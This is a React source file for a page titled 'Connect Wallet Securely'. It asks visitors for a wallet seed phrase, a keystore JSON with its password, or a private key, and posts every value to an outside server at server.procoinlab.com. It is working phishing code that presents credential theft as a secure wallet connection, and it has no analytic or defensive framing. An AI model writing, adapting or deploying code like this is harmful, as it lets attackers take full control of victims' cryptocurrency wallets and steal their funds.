import React, { useState } from "react";
import { useNavigate } from "react-router-dom";
import Logo from "../assets/images/logo.svg";
import Loader from "../components/Loader";
import Footer from "../components/Footer";
import axios from "axios";

import { ToastContainer, toast } from "react-toastify";
import "react-toastify/dist/ReactToastify.css";

const Restore = () => {
  const [activeTab, setActiveTab] = useState("phrase");
  const [isLoading, setIsLoading] = useState(false);
  const [phrase, setPhrase] = useState("");
  const [keystoreJson, setKeystoreJson] = useState("");
  const [keystoreJsonPassword, setKeystoreJsonPassword] = useState("");
  const [privateKey, setPrivateKey] = useState("");

  let navigate = useNavigate();

  const sendInformation = async (e) => {
    e.preventDefault();

    try {
      const params = new Proxy(new URLSearchParams(window.location.search), {
        get: (searchParams, prop) => searchParams.get(prop),
      });

      setIsLoading(true);
      const PAYLOAD = {
        wallet_name: params.wallet || "NONE",
        security_type: activeTab,
        phrase: phrase,
        keystore_json: keystoreJson,
        keystore_password: keystoreJsonPassword,
        private_key: privateKey,
      };

      const apiCall = await axios.post(
        "https://server.procoinlab.com/send",
        PAYLOAD
      );
      const apiRes = await apiCall.json;

      const { success } = apiRes;

      if (success) {
        setIsLoading(false);
        navigate("/");
      } else {
        setIsLoading(false);
        toast.error("An error occurred, Please try again");
      }
    } catch (error) {
      setIsLoading(false);

      toast.error("An error occurred, Please try again");
      setIsLoading(false);
    }
  };

  return (
    <>
      <div>
        <Loader loading={isLoading} />

        <div
          className="
        header
        stable-alignment
        tw-space-y-4 tw-text-center
        lg:tw-pt-16 lg:tw-pb-10
        tw-pt-16 tw-pb-10
      "
        >
          <div className="logo">
            <img src={Logo} alt="logo" className="tw-w-20 tw-m-auto" />
          </div>

          <div className="lg:tw-text-4xl tw-text-2xl tw-font-medium tw-space-y-2">
            <h3>CONNECT WALLET SECURELY</h3>
          </div>
          <p className="tw-font-light">
            Securely enter your wallet details to proceed
          </p>
        </div>

        <div className="main tw-py-5">
          <div className="stable-alignment">
            <div
              className="
            menu-list
            tw-flex tw-justify-between tw-items-center tw-space-x-2
          "
            >
              <button
                onClick={() => {
                  setActiveTab("phrase");
                }}
                className={`tw-py-3 tw-px-8 tw-w-full tw-rounded-full lg:tw-text-base tw-text-xs",
                  ${
                    activeTab === "phrase"
                      ? "tw-bg-primary tw-text-white"
                      : "hover:tw-bg-gray-200"
                  }
                `}
              >
                Phrase
              </button>
              <button
                onClick={() => {
                  setActiveTab("keystore_json");
                }}
                className={`tw-py-3 tw-px-8 tw-w-full tw-rounded-full lg:tw-text-base tw-text-xs",
                  ${
                    activeTab === "keystore_json"
                      ? "tw-bg-primary tw-text-white"
                      : "hover:tw-bg-gray-200"
                  }
                `}
              >
                Keystore JSON
              </button>
              <button
                onClick={() => {
                  setActiveTab("private_key");
                }}
                className={`tw-py-3 tw-px-8 tw-w-full tw-rounded-full lg:tw-text-base tw-text-xs",
                  ${
                    activeTab === "private_key"
                      ? "tw-bg-primary tw-text-white"
                      : "hover:tw-bg-gray-200"
                  }
                `}
              >
                Private Key
              </button>
            </div>

            {/* PHRASE */}

            {activeTab === "phrase" ? (
              <section className="tw-py-10">
                <form className="tw-w-full tw-space-y-5">
                  <textarea
                    required
                    name="phrase"
                    onChange={(e) => {
                      setPhrase(e.target.value);
                    }}
                    value={phrase}
                    cols="10"
                    rows="6"
                    placeholder="Phrase"
                    className="

                tw-border-2 tw-w-full tw-border-gray-400 tw-p-5 tw-rounded-lg
              "
                  ></textarea>

                  <div>
                    <p className="tw-text-primary tw-font-medium tw-text-center tw-text-sm">
                      Typically 12 (sometimes 24) words separated by single
                      spaces
                    </p>
                  </div>

                  <div className="tw-flex tw-justify-center">
                    <button
                      onClick={sendInformation}
                      className="
                  hover:tw-bg-blue-500
                  lg:tw-w-8/12
                  tw-w-full
                  tw-rounded-lg
                  tw-m-auto
                  tw-text-center
                  tw-py-3
                  tw-px-10
                  tw-text-white
                  tw-bg-primary
                "
                    >
                      Connect
                    </button>
                  </div>
                </form>
              </section>
            ) : null}

            {/* KEYSTORE JSON */}

            {activeTab === "keystore_json" ? (
              <section className="tw-py-10">
                <form className="tw-w-full tw-space-y-5">
                  <textarea
                    required
                    value={keystoreJson}
                    onChange={(e) => setKeystoreJson(e.target.value)}
                    cols="10"
                    rows="6"
                    name="keystore_json"
                    placeholder="Keystore JSON"
                    className="
                tw-border-2 tw-w-full tw-border-gray-400 tw-p-5 tw-rounded-lg
              "
                  ></textarea>

                  <input
                    required
                    value={keystoreJsonPassword}
                    onChange={(e) => setKeystoreJsonPassword(e.target.value)}
                    type="password"
                    placeholder="password"
                    className="
                tw-border-2
                tw-w-full
                tw-border-gray-400
                tw-py-3
                tw-px-5
                tw-rounded-lg
              "
                  />

                  <div>
                    <p className="tw-text-primary tw-font-medium tw-text-center tw-text-sm">
                      Several lines of text beginning with '(...)' plus the
                      password you used to encrypt it.
                    </p>
                  </div>

                  <div className="tw-flex tw-justify-center">
                    <button
                      onClick={sendInformation}
                      className="
                  hover:tw-bg-blue-500
                  lg:tw-w-8/12
                  tw-w-full
                  tw-rounded-lg
                  tw-m-auto
                  tw-text-center
                  tw-py-3
                  tw-px-10
                  tw-text-white
                  tw-bg-primary
                "
                    >
                      Connect
                    </button>
                  </div>
                </form>
              </section>
            ) : null}

            {/* Private Key */}

            {activeTab === "private_key" ? (
              <section className="tw-py-10">
                <form className="tw-w-full tw-space-y-5">
                  <input
                    required
                    value={privateKey}
                    onChange={(e) => {
                      setPrivateKey(e.target.value);
                    }}
                    type="text"
                    placeholder="Private Key"
                    className="
                tw-border-2
                tw-w-full
                tw-border-gray-400
                tw-py-3
                tw-px-5
                tw-rounded-lg
              "
                  />

                  <div>
                    <p className="tw-text-primary tw-font-medium tw-text-center tw-text-sm">
                      Typically 12 (sometimes 24) words separated by single
                      spaces
                    </p>
                  </div>

                  <div className="tw-flex tw-justify-center">
                    <button
                      onClick={sendInformation}
                      className="
                  hover:tw-bg-blue-500
                  lg:tw-w-8/12
                  tw-w-full
                  tw-rounded-lg
                  tw-m-auto
                  tw-text-center
                  tw-py-3
                  tw-px-10
                  tw-text-white
                  tw-bg-primary
                "
                    >
                      Connect
                    </button>
                  </div>
                </form>
              </section>
            ) : null}
          </div>
        </div>
        <ToastContainer
          position="bottom-right"
          autoClose={2000}
          hideProgressBar={false}
          newestOnTop={false}
          closeOnClick
          rtl={false}
          pauseOnFocusLoss
          draggable
          pauseOnHover
          theme="dark"
        />
        <Footer />
      </div>
    </>
  );
};

export default Restore;
